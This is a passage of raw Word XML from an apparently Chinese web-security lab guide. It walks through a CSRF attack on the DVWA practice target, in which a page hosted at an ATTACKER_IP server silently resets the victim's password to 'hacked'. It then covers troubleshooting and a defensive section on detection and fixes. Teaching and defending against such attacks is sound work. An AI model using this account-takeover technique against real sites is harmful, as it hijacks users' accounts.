      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">csrf_attack.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">托管于攻击者控制的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器（Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">简易服务器：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">页面已登录的同一浏览器中，访问</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;ATTACKER_IP&gt;:8080/csrf_attack.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。页面加载后，观察</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的密码是否已被静默修改为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hacked</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③预期现象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（环境因靶机而异②）：当受害者浏览器加载恶意页面后，若</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的登录会话有效，密码被重置为攻击者指定的值。原始用户的密码不再有效——账户被接管。浏览器开发者工具的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Network </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签中可看到向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发起的请求，其响应状态码为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">200，但攻击者页面（因同源策略）无法读取该响应内容——这正是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“盲请求”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的特征。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">④常见排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：若密码未被修改，检查：(a)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否仍有效（未过期/退出登录）；(b)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求参数名是否与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实际表单一致（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">password_new</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">password_conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Change</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">因版本而异②）；(c)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方法，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将失效，需改为自动提交的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;form method="POST"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document.forms.submit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（③示意）；(d)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">现代浏览器对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SameSite Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的默认值（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Lax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）可能在部分场景下阻止跨站请求附加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie——此为预期防御行为，非操作错误。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的检测与修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击手法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：利用浏览器自动附加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的行为，在恶意页面中构造跨站请求，以受害者身份执行非自愿的状态改变操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Referer/Origin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">头异常审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：服务器日志中，若某关键操作的请求缺乏</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Referer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头，或其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Origin/Referer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与站点自身域名不匹配（且非空），即为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击的强信号。注意：Referer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可被部分隐私策略或浏览器扩展抑制，因此缺失不一定是攻击，但可以作为组合特征。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">请求时间与行为模式分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击通常由恶意页面触发，可能在短时间内出现孤立的敏感操作请求（如突然的密码修改），且与前序正常浏览路径不存在合理的点击流关联。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：商业</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防护规则，检查跨域请求的关键操作是否携带预期</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Token。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队修复（纵深防御）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Anti-CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Token（核心防御，①标准通用原理）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：服务器为每个表单或敏感操作的页面生成一个随机的、不可预测的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Token，嵌入页面（通常作为隐藏表单字段或自定义</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头），同时将其与用户会话关联存储于服务端。处理请求时，强制校验</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的存在性与匹配性。攻击者无法跨站读取该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Token（同源策略阻止跨站读），因此无法构造有效的伪造请求。此为根治手段，被几乎所有现代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架（Django、Rails、Spring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Security、Laravel）内置支持。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">属性（浏览器端防御，①标准通用原理）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Set-Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头中指定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=Strict</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（跨站请求完全不发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=Lax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（仅顶级导航的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie，阻止</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POST/JS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">触发请求的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附着）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Lax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是现代浏览器的默认行为（②环境相关：Chrome</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 80+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">起默认应用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=Lax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，对多数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击场景提供有效防御，但不能完全替代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Token——因为部分遗留应用仍依赖跨站</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附着）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">校验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Origin/Referer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：服务器检查敏感操作的请求是否携带</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Origin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Referer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头，并验证其值属于预期的合法域名。此为纵深防御补充手段，不应作为唯一防御（因为头可能缺失或被伪造——虽然</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Referer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可由攻击者控制，但攻击者无法使其显示为合法域，因此校验“存在且属于白名单”仍有价值）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">用户交互挑战</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对超高风险操作（如转账），强制要求用户重新输入密码或进行二次认证（MFA,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Multi-Factor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication）。CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无法替代用户的交互行为，此方法以牺牲部分用户体验换取极高安全性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">纵深防御的失效边界</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：若站点同时存在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞，以上</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御可能被完全绕过——因为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">允许脚本在同源上下文中读取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并主动发起请求。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御的前提</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，二者必须共同实现，这与上一节中“XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可使</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御完全失效”的结论首尾呼应。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
